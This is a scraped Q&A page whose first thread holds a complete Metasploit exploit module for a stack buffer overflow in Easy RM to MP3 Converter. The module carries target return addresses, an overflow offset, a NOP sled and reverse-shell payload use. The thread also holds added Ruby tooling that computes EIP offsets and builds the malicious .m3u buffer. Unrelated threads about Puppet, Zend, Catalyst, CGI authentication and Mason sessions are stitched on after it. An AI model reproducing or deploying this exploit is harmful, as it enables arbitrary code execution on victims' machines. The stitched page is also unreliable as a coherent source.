Problems with metasploit's "Easyrmtomp3" exploit module - exploit

I started learning exploit writing some time back and created a few exploits. One of them being an easy rm to mp3 converter, and it worked pretty well.
However, now I thought about converting my exploits to metasploit modules, and followed the steps given in a number of articles. However, the only error that I am facing is that the payload is not working. Ultimately, I resorted to looking online for a similar module, and found one which is definitely supposed to work. However, I do not get back a meterpreter session or a shell, when using meterpreter payload. After making some changes, here is what I used:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy RM to MP3 Converter (2.7.3.700) Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in version 2.7.3.700.
        By creating a specially crafted .m3u8 file, an attacker may be able
        to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Crazy_Hacker', # Original
          'buzz',
        ],
      'Version'        => 'Version 1',
      'References'     =>
        [
          [ 'URL', 'http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00\x0a",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP2 (En)',    { 'Ret' => 0x01A13F01 } ], # Universal address (MSRMCcodec02.dll)
          [ 'Windows XP SP3 (Fr)',    { 'Ret' => 0x01AAF23A } ], # FFE4, JMP ESP from MSRMCcodec02.dll
          [ 'Windows XP (Universal)', { 'Ret' => 0x773D4540 } ], # JMP ESP in SHELL32.DLL
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 1))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'buzz.m3u' ]),
      ], self.class)
  end

  def exploit
    sploit  = "A" * 26068 # rand_text_alphanumeric(26068) # filler up to the saved return address
    sploit << [target.ret].pack('V')   # overwrite EIP with the target's JMP ESP address
    sploit << "\x90" * 30              # NOP sled
    sploit << payload.encoded
    sploit << "B" * 1000               # trailing padding
    buzz = sploit

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buzz)
  end
end
I tried out a number of payloads: meterpreter/reverse_tcp, shell/reverse_tcp, etc., but none seem to work. Any solutions?

You should also provide more details about the OS you are using and the params you have provided to run the module.
As you can see the pointer to Ret differs depending on the OS.
Have you attached a debugger yet to see what happens within the application? From what I can see and know about the exploit, your fuzzing string doesn't seem to be appropriate for the buffer:
sploit = "A" * 26068
It should be more than that. Attach a debugger and look at whether EIP has been overwritten.
Regards,
T0X1C
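The reply's advice ("attach a debugger and look at what EIP holds") only pays off if the bytes in EIP can be mapped back to a position in the file. The script below is an added example, not code from the original post or from Metasploit itself: it re-implements in plain Ruby the idea behind Metasploit's pattern_create/pattern_offset helpers (a cyclic pattern in which every 4-byte window is unique, and the reverse lookup from the EIP dword to an offset) and then rebuilds the same buffer layout as the module's exploit method with a bad-character check on the return address and payload. The offset 26068, the NOP sled and padding sizes, the BadChars and the target addresses are taken from the module as posted; the INT3 stand-in payload and the sample EIP value are constructed for the example.

```ruby
# Added example, not code from the original post or from Metasploit.
# Re-implements the helpers behind "attach a debugger and see what EIP
# holds": a cyclic pattern whose every 4-byte window is unique (the same
# Aa0Aa1... scheme Metasploit's pattern_create uses) and the reverse lookup
# from the dword in EIP to the offset, plus a layout check for the buffer
# the module above builds. Offsets, sizes and addresses are the module's.

DEFAULT_SETS = [('A'..'Z').to_a, ('a'..'z').to_a, ('0'..'9').to_a].freeze
BADCHARS     = "\x00\x0a".b.freeze   # the module's BadChars

# Build a cyclic pattern of `length` bytes: an odometer over the character
# sets, last set ticking fastest. With the default sets it repeats after
# 26*26*10*3 = 20280 bytes, so longer patterns can yield ambiguous offsets.
def cyclic_pattern(length, sets = DEFAULT_SETS)
  out = String.new(encoding: Encoding::BINARY)
  idx = Array.new(sets.length, 0)
  while out.length < length
    sets.each_with_index { |s, k| out << s[idx[k]] }
    i = sets.length - 1
    loop do                              # carry propagation, right to left
      idx[i] += 1
      break if idx[i] < sets[i].length
      idx[i] = 0
      i -= 1
      break if i < 0                     # wrapped: pattern repeats from here
    end
  end
  out[0, length]
end

# Given the value the debugger shows in EIP (an Integer as read from the
# register, or the 4 raw bytes), return every offset where it occurs in the
# pattern. More than one hit means the pattern was longer than its period.
def pattern_offsets(pattern, eip)
  needle = eip.is_a?(Integer) ? [eip].pack('V') : eip.b  # little-endian dword
  offsets = []
  pos = 0
  while (hit = pattern.index(needle, pos))
    offsets << hit
    pos = hit + 1
  end
  offsets
end

# Bytes of `str` that appear in the bad-character list, in order of first use.
def bad_bytes(str, badchars = BADCHARS)
  str.b.each_char.select { |c| badchars.include?(c) }.uniq
end

# Same layout as the module's exploit method: filler, return address,
# NOP sled, payload, trailing padding. Refuses a return address or payload
# that contains a bad character instead of writing a file that cannot work.
def build_m3u(offset:, ret:, payload:, nops: 30, tail: 1000, badchars: BADCHARS)
  ret_bytes = [ret].pack('V')
  bad = bad_bytes(ret_bytes, badchars)
  raise ArgumentError, format('ret 0x%08x contains bad chars %p', ret, bad) unless bad.empty?
  bad = bad_bytes(payload, badchars)
  raise ArgumentError, format('payload contains bad chars %p', bad) unless bad.empty?
  buf = ('A' * offset).b
  buf << ret_bytes << ("\x90".b * nops) << payload.b << ('B' * tail).b
  buf
end

# The dword that lands in EIP if `offset` really is the distance to the saved
# return address; compare it with the target's Ret before writing the file.
def eip_at(buf, offset)
  buf[offset, 4].unpack1('V')
end

if __FILE__ == $PROGRAM_NAME
  # Step 1: write `pattern` to the FILENAME instead of the "A" filler and open
  # it in the converter under a debugger (file write omitted here).
  pattern = cyclic_pattern(26068 + 1000)
  # Step 2: suppose the debugger then showed EIP = 0x61413161 ("a1Aa"):
  puts "offset candidates: #{pattern_offsets(pattern, 0x61413161).inspect}"
  # Step 3: rebuild the module's layout and confirm what lands in EIP.
  buf = build_m3u(offset: 26068, ret: 0x01A13F01, payload: "\xcc".b * 4) # INT3s stand in for payload.encoded
  puts format('dword at offset 26068: 0x%08x', eip_at(buf, 26068))
end
```

Two things worth noticing when using this against the module above. First, 26068 is larger than the 20280-byte period of the default three character sets, so a pattern long enough to reach the saved return address contains repeats and pattern_offsets can return several candidates; pass a fourth set (for example a second digit set) or confirm the candidate with a second run using a different pattern length. Second, build_m3u raising on a bad character is the check to run before blaming the payload: a target address or an encoded payload that contains 0x00 or 0x0a is never going to reach EIP intact, whatever the offset is.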

Related

PE Puppet Console and manage multiple node user accounts

I'm new to puppet and using Puppet Enterprise with the module from puppet for accounts. https://forge.puppet.com/puppetlabs/accounts
I'd like to be able to manage the user account details from the PE console for multiple users.
The best I can seem to get to is managing them within
/etc/puppetlabs/code/environments/production/manifests/site.pp
Which contains:
node default {
  accounts::user { 'jeff':
    comment  => 'Jeff McCune',
    groups   => [
      'wheel',
    ],
    locked   => true,
    sshkeys  => [
      'ssh-rsa AAAA...',
      'ssh-dss AAAA...',
    ],
    password => '!!',
    ensure   => 'present',
  }
  accounts::user { 'dave':
    comment  => 'Dave Smith',
    groups   => [
      'wheel',
    ],
    locked   => true,
    sshkeys  => [
      'ssh-rsa AAAA...',
      'ssh-dss AAAA...',
    ],
    password => '!!',
    ensure   => 'present',
  }
}
Ideally I'd like to be able to manage them per PE classification within the console, so each user's details can be parameters I enter in the PE console. The number of users would vary, but I just need the principle to be able to add more than one.
I've tried adding into a manifest but struggled with declaring more than one account. I did that by:
/etc/puppetlabs/code/environments/production/modules/my_app/manifests/init.pp
which contained:
class my_app (
  $username    = '',
  $usercomment = '',
  $sshkey      = '',
) {
  accounts::user { $username:
    comment  => $usercomment,
    groups   => [
      'sudonopw',
    ],
    locked   => false,
    sshkeys  => [
      $sshkey,
    ],
    password => '!!',
    ensure   => present,
  }
}
This allowed me to apply this class to any variation of my node classification and allow me to manage those parameters in the PE console. However I couldn't add more than one account to each node, as the class had been declared.
Can anyone give me some pointers?
Thanks

For Nukeface: Zend Framework 2 + Doctrine2 - Blog tutorial: Zend\Mvc\Controller\ControllerManager::createFromInvokable: failed retrieving

Following your blog project. Copy/paste code but ran into the problem described below. I would appreciate your assistance with the code that I have pushed to the Git repository Farsideman/Zend-Framework-2-Doctrine2---Blog-tutorial. I can't fathom it even with reading the posted answers to similar questions.
Zend\Mvc\Controller\ControllerManager::createFromInvokable: failed retrieving "blogcontrollerpost(alias: Blog\Controller\Post)" via invokable class "Blog\Controller\PostController"; class does not exist
Thanks
Farsideman
Wow, almost a year, did not realize a question had been posted. Sorry about that.
Hope you figured it out by now, just in case: the problem means that it cannot find the indicated Controller.
This most likely (and most of the times) occurs when an error is made in the configuration of a module or if the files are not in the exact right folders with exactly right capital letters.
So, make sure the structure to the Controller is as follows, starting from the root of the project:
/module/Blog/src/Controller/PostController.php
Next up, check the module.config.php file and make sure you have this, exactly as below:
'controllers' => [
    'invokables' => [
        'Blog\\Controller\\Post' => 'Blog\\Controller\\PostController',
    ],
],
Here the Blog\\Controller\\Post is an alias (alternate name) for Blog\\Controller\\PostController.
That it tries to use the alias (without Controller) is setup in the routes.config.php where it is configured that it should use a class with that aliased name and a certain function, e.g.:
//routeName: blog
//route: /blog
'blog' => [
    'type'          => 'Literal',
    'may_terminate' => true,
    'options'       => [
        'route'    => '/blog',
        'defaults' => [
            'module'     => 'Blog',
            'controller' => 'Blog\\Controller\\Post',
            'action'     => 'index',
        ],
    ],
],
All of the above is present in the "Configure module" chapter of that tutorial.
Note though: the tutorial was posted about halfway 2016, here 'n' there it's a bit outdated by now.
Also, as a side note, in the AbstractActionController.php class, add the following:
/**
 * {@inheritdoc}
 */
public function getServiceLocator()
{
    // Return the protected property the MVC layer injects, rather than
    // calling the parent (which emits the deprecation notice) or this
    // method itself (which would recurse without end).
    return $this->serviceLocator;
}
This will override its parent function, which includes the giant warning that this function is deprecated and its functionality removed in Zend Framework 3.

How to properly use UTF-8-encoded data from Schema inside Catalyst app?

Data defined inside the Catalyst app or in templates has the correct encoding and is displayed well, but from the database everything non-Latin1 is converted to ?. I suppose the problem is in the model class, which is:
use strict;
use base 'Catalyst::Model::DBIC::Schema';
__PACKAGE__->config(
    schema_class => 'vhinnad::Schema::DB',
    connect_info => {
        dsn      => 'dbi:mysql:test',
        user     => 'user',
        password => 'password',
        {
            AutoCommit        => 1,
            RaiseError        => 1,
            mysql_enable_utf8 => 1,
        },
        'on_connect_do' => [
            'SET NAMES utf8',
        ],
    }
);

1;
I see no flaws here, but something must be wrong. I used my schema also with test scripts, and the data was well encoded and the output was correct, but inside the Catalyst app I did not get the encoding right. Where may the problem be?
EDIT
For future reference I put the solution here: I mixed old and new style in connect_info.
Old style is like (dsn, username, passw, hashref_options, hashref_other_options).
New style is (dsn => dsn, username => username, etc.), so the right form is:
connect_info => {
    dsn               => 'dbi:mysql:test',
    user              => 'user',
    password          => 'password',
    AutoCommit        => 1,
    RaiseError        => 1,
    mysql_enable_utf8 => 1,
    on_connect_do     => [
        'SET NAMES utf8',
    ],
}
In a typical Catalyst setup with Catalyst::View::TT and Catalyst::Model::DBIC::Schema you'll need several things for UTF-8 to work:
add Catalyst::Plugin::Unicode::Encoding to your Catalyst app
add encoding => 'UTF-8' to your app config
add ENCODING => 'utf-8' to your TT view config
add <meta http-equiv="Content-type" content="text/html; charset=UTF-8"/> to the <head> section of your html to satisfy old IEs which don't care about the Content-Type:text/html; charset=utf-8 http header set by Catalyst::Plugin::Unicode::Encoding
make sure your text editor saves your templates in UTF-8 if they include non ASCII characters
configure your DBIC model according to DBIx::Class::Manual::Cookbook#Using Unicode
if you use Catalyst::Authentication::Store::LDAP configure your LDAP stores to return UTF-8 by adding ldap_server_options => { raw => 'dn' }
According to Catalyst::Model::DBIC::Schema#connect_info:
The old arrayref style with hashrefs for DBI then DBIx::Class options is also supported.
But you are already using the 'new' style so you shouldn't nest the dbi attributes:
connect_info => {
    dsn               => 'dbi:mysql:test',
    user              => 'user',
    password          => 'password',
    AutoCommit        => 1,
    RaiseError        => 1,
    mysql_enable_utf8 => 1,
    on_connect_do     => [
        'SET NAMES utf8',
    ],
}
This advice assumes you have fairly up to date versions of DBIC and Catalyst.
This is not necessary: on_connect_do => [ 'SET NAMES utf8' ]
Ensure the table|column charsets are UTF-8 in your DB. You can achieve things that sometimes look right even when parts are broken. The DB must be saving the character data as UTF-8 if you expect the entire chain to work.
Ensure you're using and configuring Catalyst::Plugin::Unicode::Encoding in your Catalyst app. It did have serious-ish bugs in the not too distant past so get the newest.

CGI Application Authentication using multiple drivers

I have been trying to authenticate my CGI application through 2 drivers, one that uses a username/password stored in the database and the other using LDAP Active Directory.
Following is the code:
$self->authen->config(
    DRIVER => [ 'DBI',
        DBH         => $self->dbh,
        TABLE       => 'user',
        CONSTRAINTS => {
            'user.username'     => '__CREDENTIAL_1__',
            'MD5:user.password' => '__CREDENTIAL_2__'
        },
    ],
    DRIVER => [ 'Authen::Simple::LDAP',
        host   => 'ldapad.company.com',
        basedn => 'OU=XXX,OU=XX,DC=XXX,DC=XXX',
        binddn => 'CN=usename,OU=Users,OU=XXX,OU=AD,DC=XXX,DC=xxx',
        bindpw => 'secret',
        filter => '(cn=%s)',
    ],
    CREDENTIALS        => [ 'authen_username', 'authen_password' ],
    STORE              => 'Session',
    LOGOUT_RUNMODE     => 'logout',
    LOGIN_RUNMODE      => 'login',
    POST_LOGIN_RUNMODE => 'okay',
    RENDER_LOGIN       => \&my_login_form,
);
How do I make the application check the other driver if it is not authenticated with one?
Right now, as expected, it's the driver listed at the bottom that works, and they both do, depending on which was assigned last.
I'm assuming you're using CGI::Application::Plugin::Authentication.
I think there's a small problem in your code, that justifies the fact that only the last of the two works.
Your code is like:
$self->authen->config(
    DRIVER      => [ 'DBI', ... ],
    DRIVER      => [ 'Authen::Simple::LDAP', ... ],
    CREDENTIALS => [ 'authen_username', 'authen_password' ],
    STORE       => 'Session',
    # ...
);
but $self->authen->config() takes a hash. For example, take a look at this example from the C::A::P::Authentication distribution.
Being a hash, that means that the last DRIVER entry will overwrite the previous ones.
I believe the fix is very simple:
$self->authen->config(
    DRIVER => [
        [ 'DBI', ... ],
        [ 'Authen::Simple::LDAP', ... ],
    ],
    CREDENTIALS => [ 'authen_username', 'authen_password' ],
    STORE       => 'Session',
    # ...
);
You can find an example of this in the module documentation:
http://search.cpan.org/~silasmonk/CGI-Application-Plugin-Authentication/lib/CGI/Application/Plugin/Authentication.pm#config
How do I make the application check the other driver if it is not authenticated with one?
It sounds to me like you want to check if more than one authentication method works, rather than the last one that works. Could you set up 3 different $self->authen->config() and try to login 3 different times? You use a hash to track the methods that work.

Using Apache::Session::Memcached with MasonX::Request::WithApacheSession

I'm trying to use Apache::Session::Memcached in an HTML::Mason project where I'm using MasonX::Request::WithApacheSession to handle my sessions. Unfortunately Apache will not launch when I plug in the Memcached module instead of the MySQL one. My custom handler looks something like this (a few snips here and there):
my $ah = HTML::Mason::ApacheHandler->new(
    comp_root                => $ENV{HTDOCS},
    data_dir                 => $data_dir,
    request_class            => 'MasonX::Request::WithApacheSession',
    session_use_cookie       => 0,
    args_method              => "mod_perl",
    session_args_param       => 'session_id',
    session_class            => 'Apache::Session::Memcached',
    session_Servers          => '127.0.0.1:20000',
    session_Readonly         => 0,
    session_Debug            => 1,
    session_cookie_domain    => $CONF->{global}->{site_name},
    session_cookie_expires   => "session",
    session_allow_invalid_id => 0,
);
The problem I'm running into is that the session_* parameters specific to Memcached are not being passed through to Apache::Session::Memcached like the docs say they should be. This results in this error:
The following parameter was passed in the call to HTML::Mason::ApacheHandler->new()
but was not listed in the validation options: session_Servers
Now, I have gone through and swapped all of the 3 upper case arguments to lower case, to no avail. And the docs for Apache::Session::Memcached list them as upper case.
Thanks a ton for any help.
It looks like you need to register Apache::Session::Memcached with Apache::Session::Wrapper, following the instructions at http://search.cpan.org/perldoc/Apache::Session::Wrapper#REGISTERING_CLASSES like so (code courtesy Jack M.):
Apache::Session::Wrapper::->RegisterClass(
    'name'     => 'Apache::Session::Memcached',
    'required' => [ [ 'Servers' ], ],
    'optional' => [ 'NoRehash', 'Readonly', 'Debug', 'CompressThreshold', ],
);